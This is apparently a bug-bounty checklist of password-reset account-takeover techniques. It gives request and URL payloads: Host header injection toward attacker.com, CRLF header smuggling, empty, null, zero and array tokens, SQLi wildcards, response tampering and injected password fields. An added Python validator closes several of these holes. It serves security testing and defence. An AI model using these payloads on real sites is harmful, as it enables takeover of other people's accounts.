reset_password_checklist

[ ] A lot of ideas come from this article by Omer Hesham:

https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5

[ ] Use your token on the victim's email

POST /reset
...
...
email=victim@gmail.com&token=$YOUR-TOKEN$

[ ] Host Header Injection

POST /reset
Host: attacker.com
...
email=victim@gmail.com

[ ] HTML injection in Host Header

POST /reset
Host: attacker">.com
...
email=victim@gmail.com

[ ] Leakage of the password reset token in the Referer header

Referer: https://website.com/reset?token=1234

[ ] Using company emails

While inviting users into your account/organization, you can also try inviting company emails and adding a
new field "password": "example123" or "pass": "example123" to the request; you may end up resetting a
user's password.

Company emails can be found among the members of the target's GitHub repos, or you can check http://hunter.io. Some
applications have a feature to set a password for invited emails, so here we can try adding a pass parameter.

If successful, we can use those credentials to log in to the account, SSO integrations, support panels,
etc. #BugBountyTips

[ ] CRLF in URL

With CRLF: /resetPassword?%0a%0dHost:attacker.tld (also try x-host, true-client-ip, x-forwarded...)

[ ] HTML injection in Email

HTML injection in the email via parameters, cookies, etc. > inject an image > leak the token

[ ] Remove token

http://example.com/reset?email=victims@gmail.com&token=

[ ] Change it to 0000

http://example.com/reset?email=victims@gmail.com&token=0000000000

[ ] Use a null value

http://example.com/reset?email=victims@gmail.com&token=Null/nil

[ ] Try an array of old tokens

http://example.com/reset?email=victims@gmail.com&token=[oldtoken1,oldtoken2]

[ ] SQLi bypass

Try SQLi bypasses and wildcards (%, *)

[ ] Request method / content type

Change the request method (GET, PUT, POST, etc.) and/or the content type (XML <> JSON)

[ ] Response Manipulation

Intercept the failing response and replace it with a successful one

[ ] Massive token

http://example.com/reset?email=victims@gmail.com&token=<string 1,000,000 characters long>

[ ] Cross-domain token usage

If a program has multiple domains using the same underlying reset mechanism, a reset token generated on one domain sometimes
works on another domain too.

[ ] Leaking reset token in the response body

[ ] Change 1 char at the beginning/end to see if the token is evaluated

[ ] Use Unicode character jutsu to spoof the email address

[ ] Look for race conditions

[ ] Try to register the same email with a different TLD (.eu, .net, etc.)
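As an added defensive example (not from the article or the checklist's author), a Python reset-token validator that closes the token-handling items above: a random single-use token bound to the account it was issued for, an expiry, type checks that reject empty/null/array values, a constant-time comparison so a changed first or last character is not evaluated differently, and a reset link built from configuration rather than the Host header. The function names, the in-memory store and the base URL are assumptions.

```python
import hmac
import secrets
import time
from typing import Optional

# Fixed origin for emailed links: configured, never derived from the request's Host header.
RESET_BASE_URL = "https://app.example.com"  # assumed value
TOKEN_TTL_SECONDS = 15 * 60

# Constructed in-memory store: lowercased email -> (token, expiry). One live token per account.
_pending: dict = {}


def issue_reset_token(email: str, now: Optional[float] = None) -> str:
    """Create a fresh random token for an account, replacing any earlier one."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits of entropy, 43 URL-safe characters
    _pending[email.lower()] = (token, now + TOKEN_TTL_SECONDS)
    return token


def build_reset_link(token: str) -> str:
    """Build the link from configuration so a poisoned Host header cannot steer it elsewhere."""
    return f"{RESET_BASE_URL}/reset?token={token}"


def verify_reset_token(email, token, now: Optional[float] = None) -> bool:
    """True only for a single, unexpired, correctly typed token issued for this exact account."""
    now = time.time() if now is None else now
    # Strict type checks defeat empty, null and array submissions that loose parsers coerce.
    if not isinstance(email, str) or not isinstance(token, str) or not token:
        return False
    entry = _pending.get(email.lower())
    if entry is None:  # no token pending for this account (also blocks cross-account use)
        return False
    expected, expires_at = entry
    if now > expires_at:
        _pending.pop(email.lower(), None)  # expired tokens are discarded, not retried
        return False
    # Constant-time comparison: no early exit on the first differing byte.
    if not hmac.compare_digest(expected.encode(), token.encode()):
        return False
    _pending.pop(email.lower(), None)  # single use: consume on success
    return True
```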